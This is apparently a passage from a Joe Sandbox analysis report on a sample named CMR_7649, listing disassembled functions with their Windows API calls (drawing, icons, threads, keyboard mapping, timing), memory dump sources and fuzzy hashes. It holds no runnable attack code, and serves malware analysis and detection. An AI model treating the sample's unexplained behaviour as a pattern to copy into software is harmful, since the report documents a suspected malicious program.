                                                • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                Function 00471A38 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                • SendMessageW.USER32 ref: 00471AE3
                                                • DestroyIcon.USER32(?), ref: 00471AF4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                • String ID:
                                                • API String ID: 3611059338-0
                                                • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                Function 00455616 Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: DestroyWindow$DeleteObject$IconMove
                                                • String ID:
                                                • API String ID: 1640429340-0
                                                • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                • _wcslen.LIBCMT ref: 004438CD
                                                • _wcslen.LIBCMT ref: 004438E6
                                                • _wcstok.LIBCMT ref: 004438F8
                                                • _wcslen.LIBCMT ref: 0044390C
                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                • _wcstok.LIBCMT ref: 00443931
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                • String ID:
                                                • API String ID: 3632110297-0
                                                • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                Function 00455168 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Destroy$DeleteMenuObject$IconWindow
                                                • String ID:
                                                • API String ID: 752480666-0
                                                • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                Function 004552FA Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                • String ID:
                                                • API String ID: 3275902921-0
                                                • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                Function 004556C8 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                • String ID:
                                                • API String ID: 3275902921-0
                                                • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                • String ID:
                                                • API String ID: 2833360925-0
                                                • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                Function 004555A8 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32 ref: 004555C7
                                                • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                • DeleteObject.GDI32(?), ref: 00455736
                                                • DeleteObject.GDI32(?), ref: 00455744
                                                • DestroyIcon.USER32(?), ref: 00455752
                                                • DestroyWindow.USER32(?), ref: 00455760
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                • String ID:
                                                • API String ID: 3691411573-0
                                                • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                • LineTo.GDI32(?,?,?), ref: 004472AC
                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                • LineTo.GDI32(?,?,?), ref: 004472C6
                                                • EndPath.GDI32(?), ref: 004472D6
                                                • StrokePath.GDI32(?), ref: 004472E4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                • String ID:
                                                • API String ID: 372113273-0
                                                • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDC.USER32(00000000), ref: 0044CC6D
                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CapsDevice$Release
                                                • String ID:
                                                • API String ID: 1035833867-0
                                                • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                Function 00417082 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • __getptd.LIBCMT ref: 0041708E
                                                  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                • __amsg_exit.LIBCMT ref: 004170AE
                                                • __lock.LIBCMT ref: 004170BE
                                                • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                • _free.LIBCMT ref: 004170EE
                                                • InterlockedIncrement.KERNEL32(00A02CE0), ref: 00417106
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                • String ID:
                                                • API String ID: 3470314060-0
                                                • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                  • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                • String ID:
                                                • API String ID: 3495660284-0
                                                • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                Function 00410AB0 Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Virtual
                                                • String ID:
                                                • API String ID: 4278518827-0
                                                • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                Function 004151BB Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
